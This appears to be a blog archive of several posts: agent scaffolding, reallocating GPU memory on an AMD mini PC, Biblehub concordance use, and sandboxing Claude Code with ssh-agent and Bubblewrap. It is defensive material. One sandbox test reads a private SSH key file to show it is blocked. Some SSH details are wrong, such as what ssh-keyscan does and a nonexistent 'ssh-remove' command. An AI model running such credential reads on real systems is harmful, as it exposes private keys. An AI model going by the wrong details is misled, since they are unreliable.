Stable alignment to product intent. A canonical reference must anchor all agents to a shared definition of what is being built. Without scaffolding, scope drift is quiet. Every session reinterprets the project goal by a few degrees. Over time the project curves away from its intent, and the deviation only surfaces when components fail to fit together.  Your counterspell: Give all agents access to the same product spec every time they run.  Explore how your agents ensure that they always align with your project’s north star goals & requirements.

Human-as-supervisor, not human-as-context-provider. The human role must shift from re-establishing context each session to reviewing, approving, and steering. Audit your development time.  If you are finding yourself revisiting a pattern of re-establishing context, forgive yourself and take a break.  You need to spend some time thinking about how your development flow manages context.  

Your agents should be launching by accessing a file with a stable initial context statement.  Your agents should write to it as they make decisions and changes.  This file should document decisions and update the session initiation context to describe the state that evolves as your agents build upon your foundation.  Your agents should spend their first moments figuring out what has been done so far, what lessons have been learned and where do we need to work next.  Agents should be able to discover if they’re about to break away from any thoughtfully established conventions.  Log all the time you’re spending making decisions and pasting context.  Evaluate how you could change your agents to do that work for you.

Low-cost resumption. Any agent must be able to pick up interrupted work quickly and accurately without re-analyzing the full project or guessing at prior state. Resumption remains one of the most expensive moments in agentic workflows. It should be one of the cheapest.  Cold starts of sessions should cost a file read, not a conversation.  For every agent you build, evaluate their mechanisms for resuming an interrupted session.  Don’t settle for /resume

Visible and manageable technical debt. Past decisions must be inspectable so that agents can distinguish between choices worth preserving and choices worth revisiting. Invisible debt accumulates in both directions. Agents blindly keep decisions they should change. Agents recklessly change decisions they should keep. Both paths lead to breakage. Make your agent’s historical decisions queriable.  Evaluate your agents: how do they log the decisions they make?  How do your agents avoid re-litigating a well established pattern?  What criteria do your agents follow before making a change to an established pattern?

Coordination without collision. Agents must operate with enough shared awareness to avoid duplicating, contradicting, or overwriting each other’s contributions. Collision between agents can feel random, but it is structural. It follows directly from the absence of shared state.  Shared state is cheaper than conflict resolution.  Your agents should create & update project artifacts that capture project development state.  How do your agents use files for coordination with other agents?

Five artifacts I use for scaffolding

I tried to describe the end state we want to cultivate.  Here are some of my coordination artifacts that I use to reduce my time in an interactive agent.  

These artifacts are documents that my agents create, maintain, and consult as part of their execution loop.  For every project, my agents work around: 

A Product Requirements Document that holds the high-level product statement that all agents build against. It is the fixed point we are working towards. When an agent needs to know whether a feature aligns with the product’s intent, this is where it looks.

A Features List Document that summarizes the capabilities that must be implemented. It tells an arriving agent what has been built and what remains. Resumption becomes a matter of reading a list, not reconstructing a plan. 

A PRD-Agent-Reasoning File that captures the decisions agents have made, along with the options they considered before deciding. This is the institutional memory of the project. It turns opaque choices into auditable decisions.

A Project Manifest that carries a brief project description, timestamps for creation milestones, and a record of which development phases have been completed. It answers the question every new session asks first: where are we?

An Agent-Ownership File that maps every file to the agent that created it. If you’re ever wondering if you know for sure which agent produced a file, you’re in a pattern that will cause you problems. Build agents that make accountability traceable. When something breaks, you have a map to consult to discover which built it.

What problems are solved with this scaffolding?

My artifacts serve multiple outcomes, but one outcome draws from all five: the shift from human-as-context-provider to human-as-supervisor. 

  • The PRD eliminates “what are we building?”
  • The Project Manifest eliminates “where are we?”
  • The Ownership file eliminates “who did this?”
  • The Reasoning file eliminates “why was this done?”
  • The Features List eliminates “what is left?”

If you the human keep finding yourself in the decision loop, knock it off.  Use scaffolding artifacts.  Resist the temptation to fiddle.  Make it easy for your agents to make decisions you can audit later.  If you can’t confidently start the project over from scratch, that’s a signal you’re trying to maintain too much control.  Build guardails and loosen your reins.  

Development loops become repeatable when context persists. They become auditable when agents record their decisions. Agentic development loops become enhanceable when agents preserve their rationale alongside outcomes.  The models will grow more capable, but the scaffolding problem will remain because it is not a problem of intelligence. It is a problem of continuity.  Continuity has always depended upon something being written down.  

I’d love to hear what you think about this.  If you’re struggling with these problems, let’s connect!

Allocating RAM for GPU performance on self hosted LLM systems with integrated System & GPU RAM

Are you sure that the system you’re running self-hosted LLMs on has properly allocated its GPU memory?

I was doing some work on my 128gb Ryzen AMD mini PC. I operate this machine as a linux server dedicated to self-hosted AI infrastructure. I had run into a performance problem on the system where I had saturated all resources and experienced a hard lock. After rebooting to do some troubleshooting, I discovered it didn’t look like my system was operating with 128 gb of RAM.

Diagnosing the problem

This machine’s purpose is hosting local AI inference. The product listing indicated 128 gb of unified memory. Did GMKTeck/Amazon ship me the wrong unit? I tested for system memory:

$ free -h
  Mem: 62Gi

Linux reported sixty-two gigabytes. I tested for the GPU’s VRAM total from the kernel:

$ cat /sys/class/drm/card*/device/mem_info_vram_total
  68719476736

Sixty-four gigabytes on the graphics side. Sixty-two visible to the operating system. That accounts for roughly 126 gigabytes if you add them together, but the system showed only half of the memory I thought I paid for.

Memory in integrated GPU/CPU systems

The processor on this system carries an integrated GPU. Unlike desktop workstations, there is no discrete graphics card on a separate board with dedicated memory. Every byte of physical RAM occupies one unified pool of LPDDR5X shared between CPU and GPU. I should have known this, but I didn’t. I haven’t built a gaming PC in over 20 years. On this hardware, the distinction between “system memory” and “graphics memory” exists only in firmware. On this machine, the BIOS has configurations for assigning memory to the CPU and GPUs.

Integrated graphics have been operating this way for a while. Intel’s onboard GPUs quietly borrow from 128 megabytes up to a gigabyte or two from system RAM.

The Intel 810 chipset (1999) was Intel’s first integrated graphics chipset and used what Intel called “Unified Memory Architecture” (UMA). It borrowed 7-11 MB of system RAM for the GPU’s frame buffer, textures, and Z-buffer. This document describes the Graphics and Memory Controller Hub directly.

Intel later formalized this as DVMT (Dynamic Video Memory Technology), which let the graphics driver and OS dynamically allocate system RAM to the iGPU based on real-time demand. The BIOS setting “DVMT Pre-Allocated” (letting you choose 32 MB, 64 MB, 128 MB, etc.) became a standard fixture on Intel-based motherboards for the next two decades. https://www.techarp.com/bios-guide/dvmt-mode/ documents the DVMT modes in detail.

Intel’s own support documentation still explains this architecture for current hardware: https://www.intel.com/content/www/us/en/support/articles/000020962/graphics.html confirms that integrated Intel GPUs use system memory rather than a separate memory bank.

The kernel-level term is “stolen memory” (or Graphics Stolen Memory / GSM). https://igor-blue.github.io/2021/02/10/graphics-part1.html documents how the UEFI firmware reserves a region of physical RAM for the GPU through the Global GTT, managed by hardware and invisible to the OS’s general memory pool.

This design lineage runs from the Intel 810 in 1999 through every Intel iGPU since, with the same fundamental mechanism: firmware carves system RAM away from the OS and hands it to the GPU. The Strix Halo platform applies the same idea at 1000x the scale.

I’ve never noticed because I’ve been operating with MacOS for the last 15 years.

The M-series chips (M1 through M4) share the same fundamental architecture: CPU, GPU, and Neural Engine all access one physical pool of memory. But Apple and AMD made different choices about how to manage that pool.

On Apple Silicon, macOS sees all the memory and allocates it dynamically. If you buy a MacBook with 64 GB of unified memory, top and Activity Monitor report 64 GB. The GPU draws from that pool on demand. The CPU draws from it on demand. No firmware partition divides them. When the GPU needs 20 GB for a rendering task, it gets 20 GB. When it finishes, that memory returns to the general pool. The OS arbitrates in real time.

But on this purpose-specific machine- the default resource allocations produce performance degradation. It looks like GMKTec is assuming windows and gaming are going to be the main application of this hardware. If your objective is running LLMs locally, the default config is going to need adjustments.

I reached out to GMKTec to clarify if there was a hardware problem. They indicated that the default config assigns 64 gigabytes to graphics and 64 gigabytes to the system. To fix this inefficient configuration, I needed to get into the BIOS and adjust the split.

Adjusting memory allocated to GPUs

That raised a practical question: how much memory should I allocate to the Host OS versus the GPU?

My system has Docker containers handling most of the system workload: a search engine, a workflow automation platform, a CMS, a kanban board, a chat interface for local models and the databases backing all of them. My Gnome/COSMIC desktop session was also running, plus a couple of terminal processes consuming their share of memory. Total system memory use hovered around 12 gigabytes. Fifty gigabytes of allocated system RAM sat idle.

The GPU told the same story from a different angle. Of its 64-gigabyte allocation, 330 megabytes held active data. The local inference server sat installed and waiting. Models rested on disk, ready to load, but nothing filled the VRAM. The GPU’s enormous partition accomplished almost nothing.

$ cat /sys/class/drm/card*/device/mem_info_vram_used
348594176

That returned 348,594,176 bytes, which is roughly 330 MB. The companion command for the total allocation was:

$ cat /sys/class/drm/card*/device/mem_info_vram_total
68719476736

That returned 68,719,476,736 bytes, which is 64 GB.

Both values come from the amdgpu kernel driver, which exposes them as sysfs files under /sys/class/drm/card*/device/. The mem_info_vram_used file reports how much of the GPU’s allocated partition is actively holding data at that moment. The mem_info_vram_total file reports the size of the partition itself.

This machine was built to run large language models. I wasn’t getting the utilization I expected. A 70-billion parameter model quantized to Q8 needs roughly 70 gigabytes of VRAM. With this system’s default, larger models don’t fit. I rebooted into the BIOS and bumped the GPU allocation to 96 gigabytes. The system side drops to 32 gigabytes, which still exceeds my current workloads by a wide margin. Twelve gigabytes of active use against 32 gigabytes of capacity leaves generous headroom for growth.

Post fix memory layout

Aside on model quantization

When you run something like ollama pull deepseek-coder-v2:16b, the quantization level is baked into that specific model file. If you look at the Ollama model library, you’ll typically see tags like:

  • model:7b-q4_0
  • model:7b-q5_K_M
  • model:7b-q8_0
  • model:7b-fp16

The Q4, Q5, Q8, fp16 suffixes indicate the quantization level. Lower numbers mean more compression (smaller file, less VRAM, lower quality). Higher numbers and fp16 mean less compression (larger file, more VRAM, better quality). Quantization reduces the numerical precision of a model’s weights. A weight stored at fp16 uses 16 bits. Q8 uses 8 bits. Q4 uses 4 bits. Fewer bits mean the weight carries a rounded approximation of its original value instead of the precise one the model learned during training.

Where you notice performance that is “higher quality”:

  • Complex reasoning chains. A Q4 model is more likely to lose the thread on multi-step logic, math problems, or long code generation. The accumulated rounding errors across billions of weights degrade the model’s ability to hold coherent structure over long outputs.
  • Nuance in language. Word choice becomes slightly flatter. A fp16 model might select a precise, unexpected word. The Q4 version gravitates toward more generic alternatives. The difference is hard to spot in a single response but becomes noticeable over a session.
  • Instruction following. Heavily quantized models drift from instructions more often. They might ignore a formatting constraint, repeat themselves, or partially answer a question. The precision loss makes the model slightly less responsive to the signal embedded in your prompt.
  • Factual reliability. Q4 models hallucinate marginally more. The degraded weights weaken the model’s ability to distinguish between what it “knows” confidently and what it is guessing at.

Where you probably won’t notice “lower quality” quantization levels:

  • Simple question and answer.
  • Casual conversation.
  • Summarization of short texts.

Ollama does not re-quantize a model at load time. You pick your quantization when you pull the model. With this change, I now have the ability to pull larger models with higher precision for experimentation & training. This produces increases in inference quality and a far better experience with models.

Hope this helps- To summarize:

There are a few systems that have come out in recent months that are good candidates for running local LLMs. If you get a mini-pc with AMD hardware, you’re likely going to need to adjust the split of ram for your inference goals. I covered how I encountered a problem that led me to discover problems with my config- and I summarized how to reason about changing the config for better performance.

Want help building self-hosted LLMs? Let’s connect!

Post Script:
If you’re exploring buying hardware for self hosting and considering an AMD GPU- you should absolutely take some time to read https://strixhalo.wiki/Guides/Buyer’s_Guide

The Strixhalo wiki has a ton of valuable & relevant resources.

Some Bible Translatin’

Biblehub is a nice website with a finicky UI.  Here are some instructions on how to use Biblehub’s “Strong Concordance” to perform two  actions:

  • Researching the Greek language version of terms in the New Testament
  • Finding other passages in the bible that use the relevant term 

First- go to Biblehub and search a phrase- e.g. “Joyful Always” from 1 Thessalonians 5:16.​

Note that when biblehub finds a hit for this phrase, there will be a drop down item you can select for it.  YOU MUST CLICK ON THE DROP DOWN ITEM.  Hitting “enter” will take you to a search of the database and just give you a list of instances.  Clicking on the item takes you to the identified passage where the term is found.  ​If there is no drop down that shows up- it may be that you have a typo- or the page is loading very slow.

This will take you to the verse. You can select a bible translation to compare the passage’s language in different translations.  Note the listings of all bible versions:​

Screenshot of different bible translations of the specified verse.

You now can compare different translations for their version of the statement. 

To research the Greek term for “rejoice always”, click on “Strong’s” from this page. ​

This will take you to a page that provides the original greek for the translated section:

Greek translations of “Always Rejoice” from 1 Thessalonians 5:16

To find a cross-reference list of all other passages in the bible that use that term, click on the Greek word (in this case, Chairete). This enables you to see other passages that relate to the term.

Bible Passages that use the Greek word “Chairete”

You now are a scholar who can find the original Greek for your bible passages- and find other bible passages that reference the same term! Woo!

Giving coding agents ssh access without disclosing secrets

LLM agents with read access to private ssh keys is the hottest new security mistake since the hardcoded password.

You’ve set up Claude Code (or Cursor, or Copilot) and your coding needs to connect to a remote system.

The prompt asks you: how should the agent authenticate?

What’s going on here?

ssh-keyscan is a tool that gathers the public SSH host keys found on the local system. It reduces some friction in ssh if the user has failed to put a key in an ssh connection request. If you have the public key in your $HOME directory, ssh-keyscan will try to find it.

Claude’s hoping I left a key around for the remote host. It will try to add it to the known_hosts file, which will enable it to make a direct connection to the other system if I have password auth disabled.

For extra safety- it won’t accept any scenario where the remote host’s ssh key has changed. This is “Safe” because the events where a system offers a new key should be very limited- regularly being prompted to accept a new key for a host is an indicator that someone has brought a malicious server online with the same hostname. These solutions are incomplete. In this instance, the agent’s trying to connect to a host even though it doesn’t have the key.

It’s making a valiant effort- but it will fail. I ssh-copy’d a key to this system, but I’m running sandboxed Claude and protecting the agent from access to the ssh key.

Some folks might entertain a dangerous solution: paste in your SSH key, set an environment variable, or hand over your Git credentials. It works… why worry?

You should be wondering:

Where will that secret actually go? Is it logged somewhere? Is the LLM provider training against my private key? Can the agent exfiltrate it? What happens if the agent’s process gets compromised?

The moment you hand a credential to an AI agent, you’ve lost control of it. You can’t audit where it went, you can’t revoke access without rotating secrets, and you’ve given an LLM a secret that can never leak. Chat histories get filled with desirable secrets. This should be concerning.

There is a better way to give your agents access to other systems than giving them a private key. It’s been around for decades. Networking and operations engineers use it all the time- but it seems to be less well known among devs. By the end of this post, you’ll know how to give a coding agent full SSH authentication capability while ensuring agent never knows your private key. You’ll feel greater confidence when access is revocable with a single command. Even a fully compromised agent can’t steal your private keys.

What is SSH-agent?

ssh-agent is a background process that holds your decrypted private keys in memory so you don’t have to re-enter your passphrase every time you use them.

How ssh-agent works:

  1. Your private key (e.g. ~/.ssh/id_ed25519) is stored encrypted on disk, protected by your passphrase
  2. You run ssh-add to decrypt the key and hand it to the agent
  3. The agent holds the decrypted key in memory
  4. When you ssh somewhere, the SSH client asks the agent to perform the cryptographic signing — the private key never leaves the agent process

Why ssh-agent exists:

  • Convenience — type your passphrase once per session instead of every connection
  • Security — the decrypted key lives only in memory, never written to disk unencrypted. Programs that need to authenticate
    ask the agent rather than accessing the key file directly
  • Forwarding — with ssh -A, the agent can be forwarded to remote hosts so you can hop between machines without copying your private key around. It’s essentially a secure key wallet that runs in the background for the duration of your login session.

How ssh-agent keeps ssh keys private from AI

ssh-agent implements a delegation without disclosure pattern:


  ┌─────────────┐        ┌───────────┐        ┌──────────────┐
  │  ssh-agent  │◄──────-│  Coding   │───────►│  Remote Host │
  │ (your keys) │ signs  │  Agent    │  SSH   │  (GitHub,    │
  │             │ data   │  process  │  conn  │   server)    │
  └─────────────┘        └───────────┘        └──────────────┘
  1. You start ssh-agent and unlock your key with ssh-add
  2. The coding agent inherits the $SSH_AUTH_SOCK environment variable — a Unix socket path to where the ssh-agent process is listening.
  3. When the agent needs to authenticate, SSH asks the agent process to sign a challenge
  4. The agent process asks ssh-agent (via the socket) to do the signing
  5. ssh-agent signs the challenge and returns the signature
  6. The private key never crosses the socket. Only signatures go back.

When you start ssh-agent, it creates a socket file (e.g., /tmp/ssh-XXXXX/agent.12345). It then exports the $SSH_AUTH_SOCK environment variable- which points to that socket. Any process that inherits this variable can communicate with the agent. SSH clients use this socket to ask ssh-agent to sign authentication challenges. The socket is a communication channel- it is not a credential. Reading the variable only gives you a path — without the ssh-agent process behind it, the socket is useless. This gives your agent the ability to ask for the SSH-AGENT to sign it’s requests without ever having access to the account key.

You may ask: how do I keep rogue processes from requesting signatures from the SSH-AGENT? Unfortunately- If they’re running under your user account, you’re going to have challenges. Everything that runs as you has the same access rights as you. You’ll want to move those potentially rogue processes to another user account and apply some ACLs. The nice thing about ssh-agent is you can just kill it when you’re done delegating SSH authentication to agentic processes. But if you need to be cautious:

  • Run the agent in a sandboxed environment (container, VM) with its own ssh-agent holding limited-scope keys
  • Use deploy keys with read-only access instead of your personal key
  • Use short-lived certificates (e.g., via Vault or Teleport) instead of long-lived keys

Why This Matters for AI Agents Specifically

Least privilege by design The agent can authenticate but cannot exfiltrate the secret. Even if the agent’s process is compromised, the attacker gets a socket that only works while your agent session is alive — not a portable credential.

Auditability The agent can’t copy the key and use it later or from another machine. Access is bound to the lifetime of the socket.

Revocability Kill the ssh-agent process or remove the key with ssh-remove, and the agent instantly loses access. No secret rotation needed.

No secret in the environment Compare this to the common pattern of stuffing API_KEY=sk-… into environment variables.
Those can be read by any process, printed with env, leaked in logs. The SSH_AUTH_SOCK only points to a socket. Reading the path to a socket is generally not a security sensitive action.

The Capabilty-based security model

This is an instance of a capability-based security model. Instead of sharing a secret (something you know), you share a capability (something you can do through a controlled channel). The coding agent gets the capability to authenticate as you, scoped to:

  • Time — only while the agent process runs
  • Mechanism — only through the SSH protocol
  • Operation — only signing challenges, not extracting keys

This is the same idea behind hardware security modules (HSMs), smart cards, and FIDO keys — the secret never leaves a trusted boundary, and all consumers interact through a signing oracle.

Practical Example

Start the session

eval "$(ssh-agent -s)"
Add a public key that can be exposed to the agent
ssh-add ~/.ssh/id_ed25519 
You'll be prompted to enter your passphrase for the key- and now the ssh-agent will have the ability to sign requests without exposing the private key. 

You can now launch your coding agent — it inherits SSH_AUTH_SOCK.  Your coding agent can now git pull, ssh deploy, etc. When you're done, kill the agent: 

ssh-agent -k # all delegated access revoked instantly 

You can see that killing the agent kills the socket. A coding agent can be invoked and have full SSH access without reading a secret.

Agent frameworks should be built using capability delegation. Don’t give ai agents read access to credentials. ssh-agent is a tool you can use to provision access privileges without disclosing secrets. It’s a key tool for granting AI systems access to infrastructure.

Do you need help building secure agentic products and workflows?

Let’s connect!

Post script:

After a posting on LinkedIn, Luke Hinds observed similar ideas behind a recent pull request by Francois Proulux which added UNIX Domain sockets that supports using Secure Enclave backed ssh-agents in Nono.sh. Worth a look!

A detailed writeup of Claude Code constrained by Bubblewrap.

An AI agent that can edit files can also delete them. Here’s a detailed explanation of how I set boundaries while still keeping Claude powerful.

When you let an AI assistant run commands on your computer, you face a problem: the assistant needs enough access to help you, but you don’t want it wandering through your entire system, reading your .env files, scanning your photos. Last week I wrote about how you can use Bubblewrap to prevent agents from accessing your files. There were some interesting comments on HackerNews that inspired me to do some further experimentation and explanation of my config.

I wanted to write a more detailed summary about this config for anyone who is going to try and incorporate bubblewrap into your workflow. I also want to make it insanely easy for you to get started with your bubble wrapping. To that end, I have a couple of Git Repositories you can clone to get started.

If you want to get started with bubblewrap+claude, you can use one of my sample scripts. Btw- I also created versions for fire jail & Apple’s “Containers”

https://github.com/CaptainMcCrank/SandboxedClaudeCode

The bubblewrap script passes all arguments through to Claude via “$@”. Just append your arguments after the script:

./bubblewrap_claude.sh --dangerously-skip-permissions "ruminate on the nature of life"

Don’t trust strangers on the Internet. Here is a git repository of tests you can use to prove if the containers work. read them and understand them. I have exposition below that explains each test in detail. They will help you understand how to execute the tests and validate if the controls work.

https://github.com/CaptainMcCrank/BlogCode/tree/main/BubblewrapTests

The approach above will give your bubblewrap container access to a file system structure like the following:

I welcome collaboration! Please file git issues against my code if you think you have a better approach!


The Complete Command

Here’s the full Bubblewrap command. Save this as a script (e.g., sandboxed-claude.sh), make it executable with chmod +x sandboxed-claude.sh, then run it from any project directory.

#!/usr/bin/env bash

# Optional paths - only bind if they exist
OPTIONAL_BINDS=""
[ -d "$HOME/.nvm" ] && OPTIONAL_BINDS="$OPTIONAL_BINDS --ro-bind $HOME/.nvm $HOME/.nvm"
[ -d "$HOME/.config/git" ] && OPTIONAL_BINDS="$OPTIONAL_BINDS --ro-bind $HOME/.config/git $HOME/.config/git"

bwrap \
  --ro-bind /usr /usr \
  --ro-bind /lib /lib \
  --ro-bind /lib64 /lib64 \
  --ro-bind /bin /bin \
  --ro-bind /etc/resolv.conf /etc/resolv.conf \
  --ro-bind /etc/hosts /etc/hosts \
  --ro-bind /etc/ssl /etc/ssl \
  --ro-bind /etc/passwd /etc/passwd \
  --ro-bind /etc/group /etc/group \
  --ro-bind "$HOME/.ssh/known_hosts" "$HOME/.ssh/known_hosts" \
  --bind "$(dirname $SSH_AUTH_SOCK)" "$(dirname $SSH_AUTH_SOCK)" \
  --ro-bind "$HOME/.gitconfig" "$HOME/.gitconfig" \
  $OPTIONAL_BINDS \
  --ro-bind "$HOME/.local" "$HOME/.local" \
  --bind "$HOME/.npm" "$HOME/.npm" \
  --bind "$HOME/.claude" "$HOME/.claude" \
  --bind "$PWD" "$PWD" \
  --tmpfs /tmp \
  --proc /proc \
  --dev /dev \
  --setenv HOME "$HOME" \
  --setenv USER "$USER" \
  --setenv SSH_AUTH_SOCK "$SSH_AUTH_SOCK" \
  --share-net \
  --unshare-pid \
  --die-with-parent \
  --chdir "$PWD" \
  "$(which claude)" "$@"

This looks complex. I promise it’s not. The only weirdness is at the beginning, where the script checks for optional paths like .nvm and .config/git before binding them. Not everyone uses nvm for Node.js management, and git’s config directory location varies. If you use other version managers (like fnmasdf, or volta), add similar conditional binds for their directories.

The rest of this post explains what each piece does and why I included it.


The System Tools

Your computer stores its programs in folders like /usr/lib, and /bin. These folders contain thousands of tools: file editors, network utilities, programming languages, and more.

I give the AI read-only access to these folders. “Read-only” means the AI can use these tools but cannot change them. The AI can run git to manage code. The AI can run node to execute JavaScript. But the AI cannot replace these programs with different versions or delete them.

Without these folders, every command fails with “command not found.” The sandbox contains no programs to run.

I also share a few files from /etc, your computer’s configuration folder:

  • /etc/resolv.conf: Without this, DNS lookups fail. The AI cannot translate “github.com” into an IP address, so git clone and npm install break.
  • /etc/ssl: Without this, HTTPS connections fail. The AI cannot verify that a server is who it claims to be.
  • /etc/passwd and /etc/group: Without these, programs display raw numeric IDs instead of usernames. Git commits show “1000” instead of “patrick.”

Your Personal Files

You keep important files in your home folder. Git needs your .gitconfig file to know your name and email. Node.js lives in your .nvm folder.

I share these files as read-only. The AI can use your git identity to make commits. But the AI cannot change your git settings or modify your configuration files.

SSH Access Without Exposing Your Keys

SSH keys prove your identity to remote servers. Exposing them directly to the sandbox creates risk—the AI could read your private key files. I use a safer approach: SSH agent forwarding.

The SSH agent runs outside the sandbox on your host machine. It holds your decrypted keys in memory. Programs inside the sandbox can ask the agent to sign requests, but they never see the actual key material.

Here’s how to set it up:

Step 1: Start the SSH agent (if not already running)

Most Linux desktop environments start the agent automatically. Check if yours is running:

echo $SSH_AUTH_SOCK

If this prints a path like /run/user/1000/keyring/ssh, your agent is running and you’re set.

Important: If SSH_AUTH_SOCK is empty, you can start an agent manually with eval "$(ssh-agent -s)". However, manually started agents create sockets under /tmp (e.g., /tmp/ssh-XXXXX/agent.1234). This conflicts with our sandbox’s --tmpfs /tmp mount, which creates an isolated /tmp that hides the host’s socket.

If you must use a manually started agent, either:

  1. Start the agent with a custom socket location: ssh-agent -a /run/user/$(id -u)/ssh-agent.sock and export SSH_AUTH_SOCK accordingly
  2. Or move the --tmpfs /tmp line in the script to appear before the --bind "$(dirname $SSH_AUTH_SOCK)" line (bind mounts take precedence over earlier tmpfs mounts for their specific paths)

For simplicity, I’d recommend using your desktop environment’s built-in agent when possible.

Step 2: Add your key to the agent

ssh-add ~/.ssh/id_ed25519

Replace id_ed25519 with your key’s filename. The agent prompts for your passphrase once, then holds the decrypted key in memory.

Step 3 (Optional but recommended): Require confirmation for each use

ssh-add -c ~/.ssh/id_ed25519

The -c flag tells the agent to ask for confirmation every time something tries to use the key. A dialog box appears on your screen: “Allow use of key?” You must click confirm. The AI cannot bypass this—the prompt happens outside the sandbox.

What this buys you:

ApproachAI can read private key?AI can use key silently?
Direct ~/.ssh bindingYesYes
SSH agentNoYes
SSH agent with -c flagNoNo

The sandbox script binds only ~/.ssh/known_hosts (so SSH can verify server identities) and the agent socket (so SSH can request signatures). Your private key files stay outside the sandbox entirely.


The Working Directory

Your goal is to develop software within a specific project folder. The AI needs write access to that folder to create files, modify code, and delete outdated artifacts.

I bind the current working directory ($PWD) with read-write access. When you run the sandbox script from /home/youruser/projects/my-app, the AI can modify anything inside my-app. When you run it from a different folder, the AI works there instead. The sandbox adapts to wherever you invoke it.

This scoping provides two benefits. First, the AI can do useful work—writing code, running builds, managing files. Second, the AI cannot touch anything outside that folder. Your other projects, your documents, your system files all remain invisible and unreachable.

I also give write access to two other locations outside your project folder.

The .npm folder stores downloaded packages. When the AI runs npm install, npm caches packages here so future installs run faster. Without write access, the AI could still install packages into your project’s node_modules, but every install would re-download everything from scratch. With write access to .npm, the AI can install dependencies at normal speed and benefit from cached packages across all your projects.

The .claude folder stores authentication credentials. This binding deserves special attention. When you first run Claude, you authenticate through your browser. Claude stores a session token in ~/.claude so you don’t repeat this process every time. Without write access to this folder, the sandbox cannot persist your login. You would need to re-authenticate every time you start the sandboxed Claude—a significant usability problem. With write access, you log in once and the session persists across sandbox invocations.


The Fake Temporary Folder

Every program needs a place to store temporary files. Normally, programs use /tmp, a shared folder visible to everything on your computer.

I create a fake /tmp that only the AI can see. When the AI writes temporary files, those files exist only inside the sandbox. When the sandbox closes, those files vanish.

This prevents the AI from leaving debris scattered across your system. It also prevents the AI from reading temporary files that other programs created.


Process Isolation

Your computer runs hundreds of processes at once: your web browser, your music player, system services, and more. Normally, any program can see the full list.

The --unshare-pid flag creates a separate process namespace for the sandbox. When the AI looks at running processes, it sees only itself and the programs it started. Your browser, your email client, your other terminals—all invisible. This prevents the AI from sending signals to other programs or inspecting what they do.

The --die-with-parent flag sets a kill switch: if the parent process dies, the sandbox dies with it. No orphaned AI processes linger after you close your terminal.


The Network Question

Networks present the hardest choice.

An AI with network access can clone repositories, install packages, and fetch documentation. An AI without network access cannot do any of those things.

An AI with network access can also send files or other information to external servers. This represents a real risk when working with private codebases.

I chose to allow network access. Most programming tasks require it. But you should understand: anything the AI can read, the AI can theoretically transmit elsewhere.

A paranoid setup would disable networking entirely. You would pre-download all dependencies, clone all repositories ahead of time, and work offline. This approach works for high-security situations but breaks the normal development workflow.


What This Buys You

The sandbox prevents accidents and limits damage.

The AI cannot read your documents, photos, or browser history—I never shared those folders. The AI cannot install system-wide packages or modify your shell configuration. The AI cannot see your password manager or read your email.

The AI operates in a controlled space: your project folder, plus the tools needed to work on it.


What This Does Not Buy You

The sandbox does not prevent a determined attack through the network. If the AI decided to exfiltrate your code, network access makes that possible.

The sandbox does not prevent damage to your project folder. The AI has full write access there—it can delete everything.

Security involves tradeoffs. I have tried to balance usability and protection. A tighter sandbox would be safer but less easy to use during experimentation & rapid development.

This configuration is useful for everyday development work, protected against casual mistakes but could be vulnerable to sophisticated attacks. For most scrappy programming tasks, this balance should be sufficient.


Testing Your Sandbox

Before trusting your sandbox, verify it works. These commands let you poke at the walls and confirm they hold.

Test 1: Confirm your home directory contents are hidden

bwrap \
  --ro-bind /usr /usr \
  --ro-bind /lib /lib \
  --ro-bind /lib64 /lib64 \
  --ro-bind /bin /bin \
  --bind "$PWD" "$PWD" \
  --tmpfs /tmp \
  --proc /proc \
  --dev /dev \
  --chdir "$PWD" \
  /bin/sh -c "ls $HOME/.bashrc 2>&1; ls $HOME/Documents 2>&1"

Both commands should fail with “No such file or directory”. Note that ls $HOME itself may show a partial directory structure (like Development) because Bubblewrap creates the path hierarchy needed to reach your bound $PWD. But the actual contents of your home folder—config files, documents, other projects—remain invisible.

Test 2: Confirm you cannot write to read-only paths

bwrap \
  --ro-bind /usr /usr \
  --ro-bind /lib /lib \
  --ro-bind /lib64 /lib64 \
  --ro-bind /bin /bin \
  --ro-bind "$HOME/.gitconfig" "$HOME/.gitconfig" \
  --bind "$PWD" "$PWD" \
  --tmpfs /tmp \
  --proc /proc \
  --dev /dev \
  --chdir "$PWD" \
  /bin/sh -c "echo 'test' >> $HOME/.gitconfig"

This should fail with “Read-only file system”. The sandbox prevents writes to paths mounted with --ro-bind.

Test 3: Confirm you CAN write to the working directory

bwrap \
  --ro-bind /usr /usr \
  --ro-bind /lib /lib \
  --ro-bind /lib64 /lib64 \
  --ro-bind /bin /bin \
  --bind "$PWD" "$PWD" \
  --tmpfs /tmp \
  --proc /proc \
  --dev /dev \
  --chdir "$PWD" \
  /bin/sh -c "touch sandbox-test-file && rm sandbox-test-file && echo 'Write access confirmed'"

This should print “Write access confirmed”. The sandbox allows writes to paths mounted with --bind.

Test 4: Confirm process isolation

bwrap \
  --ro-bind /usr /usr \
  --ro-bind /lib /lib \
  --ro-bind /lib64 /lib64 \
  --ro-bind /bin /bin \
  --bind "$PWD" "$PWD" \
  --tmpfs /tmp \
  --proc /proc \
  --dev /dev \
  --unshare-pid \
  --chdir "$PWD" \
  /bin/ps aux

This should show only a few processes (ps itself and its parent). Your browser, terminal, and other applications stay hidden.

Test 5: Confirm /tmp isolation

Run this in one terminal:

echo "secret from host" > /tmp/host-secret.txt

Then run this in the sandbox:

bwrap \
  --ro-bind /usr /usr \
  --ro-bind /lib /lib \
  --ro-bind /lib64 /lib64 \
  --ro-bind /bin /bin \
  --bind "$PWD" "$PWD" \
  --tmpfs /tmp \
  --proc /proc \
  --dev /dev \
  --chdir "$PWD" \
  /bin/cat /tmp/host-secret.txt

This should fail with “No such file or directory”. The sandbox has its own empty /tmp and cannot see files in the host’s /tmp.

Test 6: Confirm SSH agent works but keys are hidden

First, verify you have a key loaded in your agent:

ssh-add -l

This should list your key. Now test that the sandbox can use the agent but cannot read the key file:

bwrap \
  --ro-bind /usr /usr \
  --ro-bind /lib /lib \
  --ro-bind /lib64 /lib64 \
  --ro-bind /bin /bin \
  --ro-bind "$HOME/.ssh/known_hosts" "$HOME/.ssh/known_hosts" \
  --bind "$(dirname $SSH_AUTH_SOCK)" "$(dirname $SSH_AUTH_SOCK)" \
  --bind "$PWD" "$PWD" \
  --tmpfs /tmp \
  --proc /proc \
  --dev /dev \
  --setenv SSH_AUTH_SOCK "$SSH_AUTH_SOCK" \
  --chdir "$PWD" \
  /bin/sh -c "ssh-add -l && cat ~/.ssh/id_ed25519"

